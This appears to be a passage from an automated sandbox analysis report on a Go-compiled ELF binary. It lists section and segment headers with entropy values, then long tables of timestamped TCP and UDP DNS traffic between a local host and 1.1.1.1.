.noptrdata	PROGBITS	0x1e00e0	0x1d00e0	0x11e0c	0x0	0x3	WA	32
.data	PROGBITS	0x1f1f00	0x1e1f00	0x7f70	0x0	0x3	WA	32
.bss	NOBITS	0x1f9e80	0x1e9e80	0x34720	0x0	0x3	WA	32
.noptrbss	NOBITS	0x22e5a0	0x21e5a0	0x4650	0x0	0x3	WA	32
.note.go.buildid	NOTE	0x10f9c	0xf9c	0x64	0x0	0x2	A	4

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
PHDR	0x40	0x10040	0x10040	0x188	0x188	1.4324	0x4	R	0x10000
NOTE	0xf9c	0x10f9c	0x10f9c	0x64	0x64	5.4008	0x4	R	0x4	.note.go.buildid
LOAD	0x0	0x10000	0x10000	0xd8f00	0xd8f00	6.3416	0x5	R E	0x10000	.text .note.go.buildid
LOAD	0xe0000	0xf0000	0xf0000	0xe9938	0xe9938	5.2021	0x4	R	0x10000	.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x1d0000	0x1e0000	0x1e0000	0x19e80	0x52bf0	4.4169	0x6	RW	0x10000	.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8
LOOS+5041580	0x0	0x0	0x0	0x0	0x0	0.0000	0x2a00		0x8

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2024 04:05:00.834898949 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:00.839734077 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:00.839826107 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:00.839826107 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:00.844645023 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:01.448750973 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:01.448977947 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:02.470839977 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:02.475673914 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:02.597451925 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:02.597640991 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:03.622323036 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:03.627058983 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:03.749113083 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:03.749201059 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:09.896255970 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:09.902364969 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:10.024749041 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:10.024876118 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:11.047110081 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:11.052027941 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:11.173207998 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:11.173382998 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:13.219569921 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:13.224493027 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:13.346046925 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:13.346148968 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:15.394391060 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:15.399266958 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:15.525378942 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:15.525631905 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:19.870769024 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:19.875500917 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:19.996587992 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:19.996933937 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:21.017875910 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:21.022695065 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:21.143208027 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:21.143446922 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:27.882505894 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:27.887368917 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:28.010268927 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:28.010499001 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:32.193233013 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:32.198040009 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:32.319597006 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:32.319843054 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:38.636117935 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:38.641009092 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:38.762126923 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:38.762264967 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:40.810597897 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:40.815428972 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:40.936770916 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:40.936975002 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:50.937520027 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:50.937722921 CET	45008	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:50.942523003 CET	53	45008	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.334460020 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:54.339332104 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.339395046 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:54.339406967 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:54.344238043 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.943048000 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.943180084 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:55.964725971 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:55.969682932 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:56.311853886 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:56.311991930 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:03.566210985 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:03.571031094 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:03.692178965 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:03.692281961 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:13.693443060 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:13.693717003 CET	45108	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:13.698611975 CET	53	45108	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:15.973263979 CET	45150	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:15.978104115 CET	53	45150	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:15.978188992 CET	45150	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:15.978231907 CET	45150	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:15.983046055 CET	53	45150	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:16.624675989 CET	53	45150	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:16.625004053 CET	45150	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:24.793839931 CET	45150	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:24.798702002 CET	53	45150	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:25.154802084 CET	53	45150	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:25.154932976 CET	45150	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:34.922509909 CET	53	45150	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:34.922879934 CET	45150	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:34.927879095 CET	53	45150	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:36.406276941 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.411099911 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:36.411145926 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.411170006 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.411180973 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.415951014 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:36.415961027 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:37.017277956 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:37.017386913 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:39.152544975 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:39.157347918 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:39.278827906 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:39.279019117 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:47.473673105 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:47.478458881 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:47.599733114 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:47.599839926 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:48.621443033 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:48.626192093 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:48.747267008 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:48.747431993 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:49.769737005 CET	45190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:49.774720907 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:49.895587921 CET	53	45190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:49.895793915 CET	45190	53	192.168.2.15	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2024 04:04:57.719540119 CET	44566	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:57.721173048 CET	35502	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:57.727274895 CET	53	44566	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:57.728720903 CET	53	35502	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:57.745234966 CET	49901	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:57.747956991 CET	58438	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:57.752116919 CET	53	49901	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:57.752212048 CET	49901	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:57.754827976 CET	53	58438	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:57.754899979 CET	58438	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:57.758702040 CET	53	49901	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:57.762818098 CET	53	58438	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:58.773852110 CET	40352	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:58.774133921 CET	59362	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:58.780798912 CET	53	40352	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:58.780886889 CET	40352	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:58.781578064 CET	53	59362	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:58.781646013 CET	59362	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:58.787395954 CET	53	40352	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:58.788449049 CET	53	59362	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:59.798090935 CET	52445	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:59.798139095 CET	55879	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:59.804910898 CET	53	52445	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:59.805005074 CET	52445	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:59.805094957 CET	53	55879	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:59.805160999 CET	55879	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:04:59.811583042 CET	53	52445	1.1.1.1	192.168.2.15
Nov 2, 2024 04:04:59.811785936 CET	53	55879	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:00.821130037 CET	55812	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:00.821183920 CET	42747	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:00.828200102 CET	53	42747	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:00.828284025 CET	42747	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:00.828289032 CET	53	55812	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:00.828346968 CET	55812	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:00.834729910 CET	53	55812	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:00.834768057 CET	53	42747	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:02.456511021 CET	46720	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:02.457371950 CET	52016	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:02.463515997 CET	53	46720	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:02.463620901 CET	46720	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:02.464231968 CET	53	52016	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:02.464284897 CET	52016	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:02.470263958 CET	53	46720	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:02.470773935 CET	53	52016	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:03.604604959 CET	54169	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:03.604779959 CET	42862	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:03.615262032 CET	53	42862	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:03.615283012 CET	53	54169	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:03.615355968 CET	42862	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:03.615370989 CET	54169	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:03.622164965 CET	53	54169	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:03.622184992 CET	53	42862	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:04.755707026 CET	53692	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:04.757086039 CET	44227	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:04.762768984 CET	53	53692	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:04.762881041 CET	53692	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:04.764048100 CET	53	44227	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:04.764117002 CET	44227	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:04.769368887 CET	53	53692	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:04.770637989 CET	53	44227	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:05.778976917 CET	40753	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:05.779088020 CET	35076	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:05.785640955 CET	53	35076	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:05.785773039 CET	35076	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:05.785985947 CET	53	40753	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:05.786068916 CET	40753	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:05.792320013 CET	53	35076	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:05.792421103 CET	53	40753	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:06.801989079 CET	42898	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:06.802239895 CET	59559	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:06.809132099 CET	53	42898	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:06.809173107 CET	53	59559	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:06.809259892 CET	42898	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:06.809288979 CET	59559	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:06.815691948 CET	53	59559	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:06.815747976 CET	53	42898	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:07.828661919 CET	55240	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:07.829641104 CET	47013	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:07.836299896 CET	53	55240	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:07.836395979 CET	55240	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:07.837770939 CET	53	47013	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:07.837832928 CET	47013	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:07.844038010 CET	53	55240	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:07.845336914 CET	53	47013	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:08.853310108 CET	57346	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:08.853430033 CET	58700	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:08.860435009 CET	53	58700	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:08.860565901 CET	58700	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:08.865654945 CET	53	57346	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:08.865760088 CET	57346	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:08.867264032 CET	53	58700	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:08.872721910 CET	53	57346	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:09.880135059 CET	35568	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:09.882970095 CET	50234	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:09.886970997 CET	53	35568	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:09.887111902 CET	35568	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:09.889484882 CET	53	50234	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:09.889565945 CET	50234	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:09.893631935 CET	53	35568	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:09.896156073 CET	53	50234	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:11.033047915 CET	33905	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:11.033442974 CET	55706	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:11.040380955 CET	53	55706	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:11.040472031 CET	55706	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:11.041069031 CET	53	33905	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:11.041127920 CET	33905	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:11.047028065 CET	53	55706	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:11.047600031 CET	53	33905	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:12.180906057 CET	39273	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:12.181097984 CET	43402	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:12.187705994 CET	53	39273	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:12.187822104 CET	39273	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:12.188047886 CET	53	43402	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:12.188122034 CET	43402	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:12.194720984 CET	53	39273	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:12.195132017 CET	53	43402	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:13.205169916 CET	59332	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:13.205274105 CET	41508	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:13.212321997 CET	53	41508	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:13.212416887 CET	41508	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:13.212560892 CET	53	59332	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:13.212622881 CET	59332	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:13.219378948 CET	53	59332	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:13.219393969 CET	53	41508	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:14.355288982 CET	45889	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:14.355335951 CET	59949	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:14.361994028 CET	53	59949	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:14.362104893 CET	59949	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:14.362294912 CET	53	45889	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:14.362365007 CET	45889	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:14.368834972 CET	53	45889	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:14.368855953 CET	53	59949	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:15.380064964 CET	49354	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:15.380233049 CET	51243	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:15.387309074 CET	53	49354	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:15.387341976 CET	53	51243	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:15.387440920 CET	49354	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:15.387458086 CET	51243	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:15.394186974 CET	53	49354	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:15.394228935 CET	53	51243	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:16.536266088 CET	46579	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:16.536408901 CET	34081	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:16.543198109 CET	53	46579	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:16.543255091 CET	53	34081	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:16.543298006 CET	46579	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:16.543318987 CET	34081	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:16.550036907 CET	53	46579	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:16.550048113 CET	53	34081	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:17.561099052 CET	36992	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:17.562602043 CET	54133	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:17.568850040 CET	53	36992	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:17.568959951 CET	36992	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:17.569185972 CET	53	54133	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:17.569262028 CET	54133	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:17.575500011 CET	53	36992	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:17.575742960 CET	53	54133	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:18.586827993 CET	56034	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:18.588803053 CET	50227	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:18.594183922 CET	53	56034	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:18.594283104 CET	56034	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:18.596385956 CET	53	50227	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:18.596448898 CET	50227	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:18.601155996 CET	53	56034	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:18.603025913 CET	53	50227	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:19.614443064 CET	50812	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:19.618824005 CET	33659	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:19.621537924 CET	53	50812	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:19.621642113 CET	50812	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:19.628240108 CET	53	50812	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:19.863389015 CET	53	33659	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:19.863851070 CET	33659	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:19.870579958 CET	53	33659	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:21.004348993 CET	45723	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:21.004715919 CET	47910	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:21.011019945 CET	53	45723	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:21.011141062 CET	45723	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:21.011217117 CET	53	47910	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:21.011280060 CET	47910	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:21.017721891 CET	53	45723	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:21.017750025 CET	53	47910	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:22.155694962 CET	41051	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:22.155929089 CET	40541	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:22.162930965 CET	53	41051	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:22.162946939 CET	53	40541	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:22.163028002 CET	41051	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:22.163050890 CET	40541	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:22.169600964 CET	53	40541	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:22.169611931 CET	53	41051	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:23.185714006 CET	43695	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:23.185936928 CET	59307	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:23.192668915 CET	53	43695	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:23.192758083 CET	43695	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:23.199286938 CET	53	43695	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:23.761023998 CET	53	59307	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:23.761487961 CET	59307	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:23.768376112 CET	53	59307	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:24.781183958 CET	40983	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:24.781744003 CET	43473	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:24.788258076 CET	53	43473	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:24.788358927 CET	43473	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:24.788511038 CET	53	40983	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:24.788569927 CET	40983	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:24.794872046 CET	53	43473	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:24.795178890 CET	53	40983	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:25.807558060 CET	58842	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:25.807876110 CET	59246	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:25.814594984 CET	53	58842	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:25.814728022 CET	58842	53	192.168.2.15	1.1.1.1
